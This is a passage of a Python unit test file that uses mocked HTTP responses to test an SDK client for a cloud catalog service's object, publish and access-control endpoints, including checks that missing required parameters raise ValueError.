        # Invoke method
        response = _service.create_object(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

    @responses.activate
    def test_create_object_value_error(self):
        """
        test_create_object_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.create_object(**req_copy)
class TestGetObject():
    """
    Test Class for get_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_object_all_params(self):
        """
        get_object()

        Invoke the operation with all parameters and verify the mocked
        endpoint is hit exactly once and returns HTTP 200.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.get_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_object_value_error(self):
        """
        test_get_object_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_object(**req_copy)
class TestReplaceObject():
    """
    Test Class for replace_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_replace_object_all_params(self):
        """
        replace_object()

        Invoke the operation with all parameters and verify the response
        status and the serialized request body.
        """
        # Set up mock.  Named request_url (not url) so the later body
        # parameter named url cannot shadow it.
        request_url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.PUT,
                      request_url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Construct a dict representation of a PublishObject model
        publish_object_model = {}
        publish_object_model['permit_ibm_public_publish'] = True
        publish_object_model['ibm_approved'] = True
        publish_object_model['public_approved'] = True
        publish_object_model['portal_approval_record'] = 'testString'
        publish_object_model['portal_url'] = 'testString'

        # Construct a dict representation of a State model
        state_model = {}
        state_model['current'] = 'testString'
        state_model['current_entered'] = "2019-01-01T12:00:00Z"
        state_model['pending'] = 'testString'
        state_model['pending_requested'] = "2019-01-01T12:00:00Z"
        state_model['previous'] = 'testString'

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        id = 'testString'
        name = 'testString'
        rev = 'testString'
        crn = 'testString'
        url = 'testString'
        parent_id = 'testString'
        label_i18n = 'testString'
        label = 'testString'
        tags = ['testString']
        created = string_to_datetime('2019-01-01T12:00:00.000Z')
        updated = string_to_datetime('2019-01-01T12:00:00.000Z')
        short_description = 'testString'
        short_description_i18n = 'testString'
        kind = 'testString'
        publish = publish_object_model
        state = state_model
        catalog_id = 'testString'
        catalog_name = 'testString'
        data = {}

        # Invoke method
        response = _service.replace_object(
            catalog_identifier,
            object_identifier,
            id=id,
            name=name,
            rev=rev,
            crn=crn,
            url=url,
            parent_id=parent_id,
            label_i18n=label_i18n,
            label=label,
            tags=tags,
            created=created,
            updated=updated,
            short_description=short_description,
            short_description_i18n=short_description_i18n,
            kind=kind,
            publish=publish,
            state=state,
            catalog_id=catalog_id,
            catalog_name=catalog_name,
            data=data,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params (datetimes serialize back to ISO-8601 strings)
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['name'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['crn'] == 'testString'
        assert req_body['url'] == 'testString'
        assert req_body['parent_id'] == 'testString'
        assert req_body['label_i18n'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['tags'] == ['testString']
        assert req_body['created'] == "2019-01-01T12:00:00Z"
        assert req_body['updated'] == "2019-01-01T12:00:00Z"
        assert req_body['short_description'] == 'testString'
        assert req_body['short_description_i18n'] == 'testString'
        assert req_body['kind'] == 'testString'
        assert req_body['publish'] == publish_object_model
        assert req_body['state'] == state_model
        assert req_body['catalog_id'] == 'testString'
        assert req_body['catalog_name'] == 'testString'
        assert req_body['data'] == {}

    @responses.activate
    def test_replace_object_required_params(self):
        """
        test_replace_object_required_params()

        Invoke the operation with only the required parameters and verify
        the response status.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.replace_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_replace_object_value_error(self):
        """
        test_replace_object_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.replace_object(**req_copy)
class TestDeleteObject():
    """
    Test Class for delete_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL without a trailing slash can be matched literally; otherwise
        # register a regex that tolerates one or more trailing slashes.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_object_all_params(self):
        """
        delete_object()

        Invoke the operation with all parameters and verify the mocked
        endpoint is hit exactly once and returns HTTP 200.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.delete_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_object_value_error(self):
        """
        test_delete_object_value_error()

        Verify that a ValueError is raised whenever any single required
        parameter is missing (None).
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict:
            # Compare keys with == rather than `is`: identity comparison only
            # works for interned strings and is fragile for other key types.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_object(**req_copy)
class TestGetObjectAudit():
    """
    Test Class for get_object_audit
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_object_audit_all_params(self):
        """
        get_object_audit()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/audit')
        mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.get_object_audit(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_object_audit_value_error(self):
        """
        test_get_object_audit_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/audit')
        mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_object_audit(**req_copy)
class TestAccountPublishObject():
    """
    Test Class for account_publish_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_account_publish_object_all_params(self):
        """
        account_publish_object()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/account-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.account_publish_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_account_publish_object_value_error(self):
        """
        test_account_publish_object_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/account-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.account_publish_object(**req_copy)
class TestSharedPublishObject():
    """
    Test Class for shared_publish_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_shared_publish_object_all_params(self):
        """
        shared_publish_object()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/shared-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.shared_publish_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_shared_publish_object_value_error(self):
        """
        test_shared_publish_object_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/shared-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.shared_publish_object(**req_copy)
class TestIbmPublishObject():
    """
    Test Class for ibm_publish_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_ibm_publish_object_all_params(self):
        """
        ibm_publish_object()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/ibm-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.ibm_publish_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_ibm_publish_object_value_error(self):
        """
        test_ibm_publish_object_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/ibm-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.ibm_publish_object(**req_copy)
class TestPublicPublishObject():
    """
    Test Class for public_publish_object
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_public_publish_object_all_params(self):
        """
        public_publish_object()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/public-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.public_publish_object(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_public_publish_object_value_error(self):
        """
        test_public_publish_object_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/public-publish')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.public_publish_object(**req_copy)
class TestCreateObjectAccess():
    """
    Test Class for create_object_access
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_create_object_access_all_params(self):
        """
        create_object_access()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        responses.add(responses.POST,
                      url,
                      status=201)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Invoke method
        response = _service.create_object_access(
            catalog_identifier,
            object_identifier,
            account_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

    @responses.activate
    def test_create_object_access_value_error(self):
        """
        test_create_object_access_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        responses.add(responses.POST,
                      url,
                      status=201)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
            "account_identifier": account_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.create_object_access(**req_copy)
class TestGetObjectAccess():
    """
    Test Class for get_object_access
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_object_access_all_params(self):
        """
        get_object_access()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        mock_response = '{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Invoke method
        response = _service.get_object_access(
            catalog_identifier,
            object_identifier,
            account_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_object_access_value_error(self):
        """
        test_get_object_access_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        mock_response = '{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
            "account_identifier": account_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_object_access(**req_copy)
class TestDeleteObjectAccess():
    """
    Test Class for delete_object_access
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_object_access_all_params(self):
        """
        delete_object_access()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Invoke method
        response = _service.delete_object_access(
            catalog_identifier,
            object_identifier,
            account_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_object_access_value_error(self):
        """
        test_delete_object_access_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        account_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
            "account_identifier": account_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_object_access(**req_copy)
class TestGetObjectAccessList():
    """
    Test Class for get_object_access_list
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_object_access_list_all_params(self):
        """
        get_object_access_list()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        limit = 1000
        offset = 38

        # Invoke method
        response = _service.get_object_access_list(
            catalog_identifier,
            object_identifier,
            limit=limit,
            offset=offset,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string

    @responses.activate
    def test_get_object_access_list_required_params(self):
        """
        test_get_object_access_list_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Invoke method
        response = _service.get_object_access_list(
            catalog_identifier,
            object_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_object_access_list_value_error(self):
        """
        test_get_object_access_list_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_object_access_list(**req_copy)
class TestDeleteObjectAccessList():
    """
    Test Class for delete_object_access_list
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_object_access_list_all_params(self):
        """
        delete_object_access_list()
        """
        # Set up mock
